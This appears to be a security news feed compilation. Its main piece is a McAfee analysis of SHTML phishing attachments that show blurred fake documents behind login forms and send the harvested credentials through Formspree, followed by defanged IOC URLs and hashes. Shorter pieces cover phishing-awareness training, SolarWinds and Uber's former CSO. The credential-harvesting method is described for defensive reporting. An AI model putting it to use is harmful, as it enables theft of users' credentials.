Authored By Anuradha

McAfee Labs has recently observed a new wave of phishing attacks. In this wave, the attacker has been abusing server-parsed HTML (SHTML) files. The SHTML files are commonly associated with web servers redirecting users to malicious, credential-stealing websites or display phishing forms locally within the browser to harvest user-sensitive information. 

SHTML Campaign in the field: 

Figure 1. shows the geological distribution of McAfee clients who detect malicious SHTML files. 

Figure 1. McAfee Client Detection of SHTML 

 

Attackers victimize users by distributing SHTML files as email attachments. The sentiments used in such phishing emails include a payment confirmation, invoice, shipment etc., The email contains a small thread of messages to make the recipient more curious to open the attachment.  

Figure 2. Email with SHTML attachment 

 

Analysis: 

When the SHTML attachment is clicked, it opens a blurred fake document with a login page in the browser as shown in Figure 3. To read the document, however, the user must enter his/her credentials. In some cases, the email address is prefilled. 

Figure 3. Fake PDF document 

 

Figure 4. Fake Excel document 

 

Figure 5. Fake DHL Shipping document

 

Attackers commonly use JavaScript in the SHTML attachments that will be used either to generate the malicious phishing form or to redirect or to hide malicious URLs and behavior. 

 

Figure 6. SHTML with JavaScript code 

 

Below is the code snippet that shows how the blurred background image is loaded. The blurred images are taken from legitimate websites such as: 

https://isc.sans.edu  

https://i.gyazo.com 

Figure 7. Code to load blurred image  

 

Abusing submission form service: 

Phishing attacks abuse static form service providers to steal sensitive user information, such as Formspree and Formspark

Formspree.io is a back-end service that allows developers to easily add forms on their website without writing server-side code, it also handles form processing and storage. It takes HTML form submissions and sends the results to an email address. 

The attackers use the formpsree.io URL as an action URL which defines where the form data will be sent. Below Figure 8. shows the code snippet for action URL that works in conjunction with POST method.  

 

Figure 8. Formspree.io as action URL with POST method 

 

When the user enters the credentials and hits the “submit” button, the data is sent to Formspree.io. Subsequently, Formspree.io forwards the information to the specified email address. Below Figure 9. shows the flow of user submission data from webpage to attacker email address. 

Figure 9. Flow of user submission data 

 

Known malicious forms may be blocked, preventing the form submission data from being sent to the attacker. Below Figure 10. shows the Form blocked due to suspected fraudulent activity. 

Figure 10. Form Blocked 

 

To prevent the user from recognizing that they’ve just been phished, the attacker redirects the user’s browser to an unrelated error page that is associated to a legitimate website. 

Below Figure 11.  shows the redirected webpage.

Figure 11. Redirected webpage 

 

To conclude, phishing is a form of social engineering in which attackers trick people into disclosing confidential information or installing malware. It is a widespread and pervasive problem. This blurry image phishing scam uses simple basic HTML and JavaScript code, but it can still be effective. A blurry image is enough to trick many users into believing the email as legitimate. To stay protected, users should keep their system up-to-date and refrain from clicking links and opening SHTML attachments that comes through email from untrusted sources. 

 

IOCs 

McAfee customers are protected against this phishing campaign. 

 

Type  
Value  
Product  
Detected  

URL  
formspree[.]io/f/xjvderkn 
McAfee WebAdvisor  
Blocked  

URL  
cianindustries[].com/error/excel.php 
McAfee WebAdvisor  
Blocked  

 

URL  
twenty88[.]com/mincs/mea.ph 
McAfee WebAdvisor  
Blocked  

URL  
sweet.classicbo[.]com/mailb_fixpd.ph 
McAfee WebAdvisor  
Blocked  

 

 

 

Type 
Value 
Product 
Detected 

shtml(Adobe) 
0a072e7443732c7bdb9d1f3fdb9ee27c 
Total Protection and LiveSafe 
HTML/Phishing.qz 

shtml(Excel) 
3b215a37c728f65c167941e788935677 
Total Protection and LiveSafe 
HTML/Phishing.rb 

shtml(DHL) 
257c1f7a04c93a44514977ec5027446c 
Total Protection and LiveSafe 
HTML/Phishing.qz 

 

 

 

 

 

 

 

 

 

 

The post New Wave of SHTML Phishing Attacks appeared first on McAfee Blog.

Read More

The content of this post is solely the responsibility of the author.  AT&T does not adopt or endorse any of the views, positions, or information provided by the author in this article. 

As technology advances, phishing attempts are becoming more sophisticated. It can be challenging for employees to recognize an email is malicious when it looks normal, so it’s up to their company to properly train workers in prevention and detection.

Phishing attacks are becoming more sophisticated

Misspellings and poorly formatted text used to be the leading indicators of an email scam, but they’re getting more sophisticated. Today, hackers can spoof email addresses and bots sound like humans. It’s becoming challenging for employees to tell if their emails are real or fake, which puts the company at risk of data breaches.

In March 2023, an artificial intelligence chatbot called GPT-4 received an update that lets users give specific instructions about styles and tasks. Attackers can use it to pose as employees and send convincing messages since it sounds intelligent and has general knowledge of any industry.

Since classic warning signs of phishing attacks aren’t applicable anymore, companies should train all employees on the new, sophisticated methods. As phishing attacks change, so should businesses.

Identify the signs

Your company can take preventive action to secure its employees against attacks. You need to make it difficult for hackers to reach them, and your company must train them on warning signs. While blocking spam senders and reinforcing security systems is up to you, they must know how to identify and report themselves.

You can prevent data breaches if employees know what to watch out for:

Misspellings: While it’s becoming more common for phishing emails to have the correct spelling, employees still need to look for mistakes. For example, they could look for industry-specific language because everyone in their field should know how to spell those words.
Irrelevant senders: Workers can identify phishing — even when the email is spoofed to appear as someone they know — by asking themselves if it is relevant. They should flag the email as a potential attack if the sender doesn’t usually reach out to them or is someone in an unrelated department.
Attachments: Hackers attempt to install malware through links or downloads. Ensure every employee knows they shouldn’t click on them.
Odd requests: A sophisticated phishing attack has relevant messages and proper language, but it is somewhat vague because it goes to multiple employees at once. For example, they could recognize it if it’s asking them to do something unrelated to their role.

It may be harder for people to detect warning signs as attacks evolve, but you can prepare them for those situations as well as possible. It’s unlikely hackers have access to their specific duties or the inner workings of your company, so you must capitalize on those details.

Sophisticated attacks will sound intelligent and possibly align with their general duties, so everyone must constantly be aware. Training will help employees identify signs, but you need to take more preventive action to ensure you’re covered.

Take preventive action

Basic security measures — like regularly updating passwords and running antivirus software — are fundamental to protecting your company. For example, everyone should change their passwords once every three months at minimum to ensure hackers have limited access even if their phishing attempt is successful.

Training ensures employees are prepared since they’re often highly susceptible to attacks. The cybersecurity team can create phishing simulations to mimic actual threats. For example, they send emails with fake links and track how many people click them. If anyone does, you can retrain them on proper behavior to ensure it doesn’t happen again. With attacks becoming more intelligent, preparing the company for everything is essential.

Know how you’ll respond

You can remain protected even when phishing attacks are successful as long as you have the proper security measures in place. For example, out of the 1,800 emails one company received during an attack, 14 employees clicked the link because they didn’t notice the warning signs. Even though the malware was set to install, almost every device remained unaffected because they were updated and secured. The company detected malicious software on the one that wasn’t secured and fixed the issue within hours.

Training can’t prevent every employee from clicking on malicious links or attachments, so you must have a proper response. You can still prevent attacks at this stage if you and your company’s employees know what comes next.

Updated security software and procedures will protect against sophisticated phishing attacks:

Reporting: Ensure everyone knows how to report to you so you can react quickly to the potential threat. They must identify the signs they’ve clicked on a malicious attachment.
Prevention: Software that blocks malware from being downloaded will prevent the attack from being successful.
Detection: Employees must identify if their hardware is being affected and detection software must alert you of a successful breach.
Response: You should clean any affected hardware immediately to stop the attack from doing damage.

Sophisticated phishing attacks aren’t avoidable, but you can minimize their effects if you manage your response. It’s likely they won’t recognize the email is malicious if they click the link thinking it’s legitimate, so you must train them on the appropriate identification and detection.

Avoid sophisticated phishing attacks

Training and simulated phishing attempts will help protect your company. Updated passwords and security systems will also make your systems more secure. You can prevent sophisticated attacks targeting employees if employees know how to recognize warning signs and the proper procedures.

Read More

Attackers love to find weak spots in our domains and networks. Too often, they can enter systems to lie in wait and launch attacks at a later time. A case in point is the infamous SolarWinds software attack, which infected up to nine US agencies and many organizations with backdoors into their infrastructure. 

Recent investigations show that the Department of Justice may have been aware of the potential for a breach months before it happened. Prior to purchasing the affected software, a trial was installed on sample servers and network administrators appear to have been concerned and questioned when there was unusual traffic from one of the servers. Investigators were brought in to examine the situation, but no one understood the significance until months later.

To read this article in full, please click here

Read More

After covering up a data breach that impacted the personal records of 57 million Uber passengers and drivers, the company’s former Chief Security Officer has been found guilty and sentenced by a US federal judge.

Read more in my article on the Hot for Security blog.

Read More